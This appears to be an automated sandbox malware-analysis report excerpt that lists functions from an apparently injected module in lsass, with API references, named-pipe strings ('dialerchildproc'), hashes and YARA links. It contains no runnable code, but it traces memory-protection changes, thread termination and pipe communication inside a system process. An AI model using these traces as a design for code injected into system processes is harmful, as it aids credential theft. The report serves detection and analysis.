Instruction Fuzzy Hash: DF3197A2100B8AE0FB04EF69E8DD7DC2321B754384FC35523A769031779E7A866EC390

Function 00000202C0AE23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000202C0AE2405
GetCurrentProcessId.KERNEL32 ref: 00000202C0AE240F

Part of subcall function 00000202C0AE19AC: OpenProcess.KERNEL32 ref: 00000202C0AE19CA
Part of subcall function 00000202C0AE19AC: IsWow64Process.KERNEL32 ref: 00000202C0AE19E0
Part of subcall function 00000202C0AE19AC: CloseHandle.KERNEL32 ref: 00000202C0AE19FB

CreateFileW.KERNEL32 ref: 00000202C0AE2468
WriteFile.KERNEL32 ref: 00000202C0AE2490
ReadFile.KERNEL32 ref: 00000202C0AE24AF
CloseHandle.KERNEL32 ref: 00000202C0AE24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000202C0AE243F
\\.\pipe\dialerchildproc64, xrefs: 00000202C0AE2438

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: a2b6e8064d34f6058f400fa62b6a60ed05e28081ee27e155f540df09f2b9bfab
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 58211837618B40D2FB109B25E58C75E67A0F789BA4F514217EB9902BAADF3DC54DCB00

Function 00000202C0AE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000202C0AE10AB
RegEnumValueW.ADVAPI32 ref: 00000202C0AE110E
GetProcessHeap.KERNEL32 ref: 00000202C0AE1155
HeapAlloc.KERNEL32 ref: 00000202C0AE1163
GetProcessHeap.KERNEL32 ref: 00000202C0AE1187
HeapFree.KERNEL32 ref: 00000202C0AE1195

Strings

d, xrefs: 00000202C0AE10CE

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: beb3484aa7eb7072961678706af01f231505dba17c28f7f05dceca5e8fb339fc
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 38418273214B90D7E7608F52E48879EB7A1F388B84F01822BDB9907B55DF38D169CB00

Function 00000202C0AB69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000202C0AB6A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000202C0AB6A6A
_RTC_Initialize.LIBCMT ref: 00000202C0AB6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000202C0AB6ABE
__scrt_release_startup_lock.LIBCMT ref: 00000202C0AB6AE9

Memory Dump Source

Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: c51e0415e1b0b4e1f38e484a64db28ef20f8ba36d571437a8af6fe375b171dd7
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: B081D331600741C6FA54AB29A4CD39D66E8FB46780F47402BEB49977B7DB7DC94E8700

Function 00000202C0AE75F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000202C0AE7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000202C0AE766A
_RTC_Initialize.LIBCMT ref: 00000202C0AE7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000202C0AE76BE
__scrt_release_startup_lock.LIBCMT ref: 00000202C0AE76E9

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 62707e5ddcb1c22e119202a5bac5f5c202d9faddf4cc597c2adbdb7861f3ec9d
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 0481E4227047C1C6FB54AB29A8CD36D2291BB95780F1A4017DBE947797DF39CAAD8700

Function 00000202C0AE9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00000202C0AE9889
GetLastError.KERNEL32 ref: 00000202C0AE9897
LoadLibraryExW.KERNEL32 ref: 00000202C0AE98C1
FreeLibrary.KERNEL32 ref: 00000202C0AE9907
GetProcAddress.KERNEL32 ref: 00000202C0AE9913

Strings

api-ms-, xrefs: 00000202C0AE98A9

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: ce9526800f8a0f85bc88793c8825a76fdea1355de21c7931be02b529e6a7b8ed
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 00319032212B90D1FE11DB06A89C79D6294BB09BA0F1B052B9FBE473A2DF38C55D8304

Function 00000202C0AF1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000202C0AF1BCD
GetLastError.KERNEL32 ref: 00000202C0AF1BD9
CloseHandle.KERNEL32 ref: 00000202C0AF1BF1
CreateFileW.KERNEL32 ref: 00000202C0AF1C1C
WriteConsoleW.KERNEL32 ref: 00000202C0AF1C3B

Strings

CONOUT$, xrefs: 00000202C0AF1BFD

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 3bab10382ae25f38b3b1a5c87630ee1a7d71810807f588bc5720f1820a17ff55
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: DE116D23318B40C6FB508B56E88C31D66A0F788FE4F054227EB5D87B95DF7AC9488744

Function 00000202C0AE5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5C4B
GetThreadContext.KERNEL32 ref: 00000202C0AE5DB5

Part of subcall function 00000202C0AE5A40: GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5A44

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: c4d4982ed5f191253c8f6e8d384e846f457355d32d9817d38341f348d629b157
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: EAD19536208B88C6EA70DB1AE49835E77A0F788B84F110217EBDD47BA6DF39C555CB00

Function 00000202C0AE30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000202C0AE30D7
HeapAlloc.KERNEL32 ref: 00000202C0AE30EA
StrCmpNIW.SHLWAPI ref: 00000202C0AE316B
GetProcessHeap.KERNEL32 ref: 00000202C0AE31D1
HeapFree.KERNEL32 ref: 00000202C0AE31DF

Strings

dialer, xrefs: 00000202C0AE3164

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: f6eecbd787ff78f4e92c6b6fac0e43704a481cf27d926e02e8b7673ce402a933
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: D4319523705B95C2FF55DF56988C36D63A0FB44B84F0682279F9807B56EB38C4B98700

Function 00000202C0AE1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000202C0AE1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000202C0AE1A58
PathFindFileNameW.SHLWAPI ref: 00000202C0AE1A67
lstrlenW.KERNEL32 ref: 00000202C0AE1A73
StrCpyW.SHLWAPI ref: 00000202C0AE1A86
CloseHandle.KERNEL32 ref: 00000202C0AE1A94

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 0e6e3f53f89941e48a061f18c1508fc8a90b32be57fc0da4f932eebc6dbdb7ec
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: CB013522305B8196FB10DB12A89C76963A1E788FC0F498137CF9943756DE39C9898300

Function 00000202C0AE37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000202C0AE37C8
GetCurrentProcess.KERNEL32 ref: 00000202C0AE37D6
VirtualProtectEx.KERNEL32 ref: 00000202C0AE37F8
GetCurrentProcess.KERNEL32 ref: 00000202C0AE3819
VirtualProtectEx.KERNEL32 ref: 00000202C0AE383A
TerminateThread.KERNEL32 ref: 00000202C0AE3849

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: d4c0bd763e822144200f078a16a066fcebdfd944db47271af984dff9e080ac38
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 23111777615B80C2FB249B21E88D71E66A0BB48B85F06052BDB99077A6EF3EC51C8704

Function 00000202C0AE90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000202C0AE9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000202C0AE9198
RtlUnwindEx.NTDLL ref: 00000202C0AE91E7

Strings

f, xrefs: 00000202C0AE9116
csm, xrefs: 00000202C0AE917E

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 38ba8f7b21269fd3b9bf4da63608bcae845370928ebf667d63f4109bac76b113
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 2351AD32211B81DAFB54CB15E48CB9D3795F384B88F528223DBA64778AEB75C859C708

Function 00000202C0AE3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000202C0AE3222
StrCpyW.SHLWAPI ref: 00000202C0AE3232
StrCatW.SHLWAPI ref: 00000202C0AE323E
PathCombineW.SHLWAPI ref: 00000202C0AE324C

Strings

\\.\pipe\, xrefs: 00000202C0AE3218

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 58c620da79e6000e9b79ff87e859777da2d69fa67d42e0e12367462d5b8a3e82
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: CAF08263308B80D1FB109B53B98C19DA224AB58FD0F098133DF9A07B2ACE3DC4998700

Function 00000202C0AEA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000202C0AEA154
GetProcAddress.KERNEL32 ref: 00000202C0AEA16A
FreeLibrary.KERNEL32 ref: 00000202C0AEA187

Strings

CorExitProcess, xrefs: 00000202C0AEA163
mscoree.dll, xrefs: 00000202C0AEA14B

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 44c2d7fa17ed85bb862da8537152fd98739825cdb4636ec5640dd3ff4b972415
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 2FF01263315784D2FF549B60E8CC36D2360AF58B90F46211B975B46666DF39C49CC700

Function 00000202C0AE51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5236

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: aeb55cec6b7a55ca872fc64ee18e19171bdb6a382fd37deb22fb8e8d49dba66c
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 8602A536219BC0C6EBA08B55F49835EB7A1F385794F110117EBDE87BA9DB79C498CB00

Function 00000202C0AF0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000202C0AF08A2
GetConsoleMode.KERNEL32 ref: 00000202C0AF0960
GetLastError.KERNEL32 ref: 00000202C0AF09EA

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: f7ed3af27d76bfccc9fb8471a0bf51769a4ebcf67aed316be1b93732fc8d91bd
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 0B81BB33610750C9FB60AB6688CCBAD67A1F744BC8F464217DF4A53B97DB368449C710

Function 00000202C0AE57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5806

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 9d399a640bb9f226b8de1ae05f8772ff06d01c88ddc70a103681ebeca164bd03
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 9761C636519B80C6FA609B25F48C31EB7A1F388784F110217EBDD47BAACB78C568DB04

Function 00000202C0AC12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000202C0AC12E0
_set_statfp.LIBCMT ref: 00000202C0AC12FB
_set_statfp.LIBCMT ref: 00000202C0AC1317
_set_statfp.LIBCMT ref: 00000202C0AC1353

Memory Dump Source

Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 6e56fc8b63f1f048d3204ae722a941395d88e5c8d400caab7e798ae4ce33c819
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: DB11E532B54F80C5F6E41169E4DE3AD14406B57FBCF8B0637AB760EBDB8A1A8C4A4200

Function 00000202C0AF1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000202C0AF1EE0
_set_statfp.LIBCMT ref: 00000202C0AF1EFB
_set_statfp.LIBCMT ref: 00000202C0AF1F17
_set_statfp.LIBCMT ref: 00000202C0AF1F53

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 2edf33ed1164340e63f63a0d3027f3ef493e8ef5cc600c618098d4d6d1b67b67
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2411A133F58B41C2F6B81168E5DE36D5041BB64B74F4B4627BB7B863E78B6A8C4A4300

Function 00000202C0AE3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000202C0AE3886
GetCurrentProcess.KERNEL32 ref: 00000202C0AE38B4
VirtualProtectEx.KERNEL32 ref: 00000202C0AE38D6
GetCurrentProcess.KERNEL32 ref: 00000202C0AE38F4
VirtualProtectEx.KERNEL32 ref: 00000202C0AE3915

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: dbbd5d7f491f5f6cac3024bf119a0553ff861928dcc2bdfd02cc551a2ac0404d
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: E8112A2B709B81C2FB149B15F45C66D66A0F748B84F05412BDF9907796EF3EC518C704

Function 00000202C0AB84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000202C0AB8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000202C0AB8598

Strings

f, xrefs: 00000202C0AB8516
csm, xrefs: 00000202C0AB857E

Memory Dump Source

Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 843d508fee68e9f0da860d3dd1df250c16b123aac621513f78a37fb2d2a1be6c
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: CA518B32612740CAFB28DF29E89CB5D3795F344B98F528227DB1A4778AEB35D849C704

Function 00000202C0AB84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000202C0AB8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000202C0AB8598

Strings

f, xrefs: 00000202C0AB8516
csm, xrefs: 00000202C0AB857E

Memory Dump Source

Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: c2eb2bca5980e0c59ae566e84900ae8bcf2cadf27a87c2250409bce9c75e3fed
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 94314972211B40D6FB28DF1AE88CB1D37A4F740B98F168217AF5A07786DB39C949C709

Function 00000202C0AE14B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000202C0AE14D5
HeapFree.KERNEL32 ref: 00000202C0AE14E4
GetProcessHeap.KERNEL32 ref: 00000202C0AE14F0
HeapFree.KERNEL32 ref: 00000202C0AE14FF
GetProcessHeap.KERNEL32 ref: 00000202C0AE152A

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 945601e3b27397f986722e3b1cc47763393b7b8073906fe23662012aa6634302
Instruction ID: c9f716bf4cc3f8ec9a282e89e69f0f8b796e66f93dce3a389dc466fbe3e5612a
Opcode Fuzzy Hash: 945601e3b27397f986722e3b1cc47763393b7b8073906fe23662012aa6634302
Instruction Fuzzy Hash: FC115B33518B98D2FB54DF66A88C21EB760F789F84F05421BDB9A03756DF39C0598744

Function 00000202C0AE24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000202C0AE25C3
StrCpyW.SHLWAPI ref: 00000202C0AE25DA

Strings

\\.\pipe\, xrefs: 00000202C0AE25CE

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: f68ce4ff1c380156d6e01e187fc5e501ed0446d0c87c75e41adf4d4f80eeadcb
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 4D51B5322187C1C2F6749F29A5DC3AE6651F785780F464227DFEA07B9BDE39C4298B40

Function 00000202C0AF0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000202C0AF071B
GetLastError.KERNEL32 ref: 00000202C0AF073D

Strings

U, xrefs: 00000202C0AF06C7

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 9136cd904abf1a888aa88204d6ce35162ce64a2a17a793135470f4bd62100658
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 4A418073214B80C1EB609F26E48C79EA7A1F388784F424027EB8D87B99DB79C555CB40

Function 00000202C0AED6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000202C0AED6F9
LCMapStringW.KERNEL32 ref: 00000202C0AED781

Strings

LCMapStringEx, xrefs: 00000202C0AED6DC, 00000202C0AED6ED

Memory Dump Source

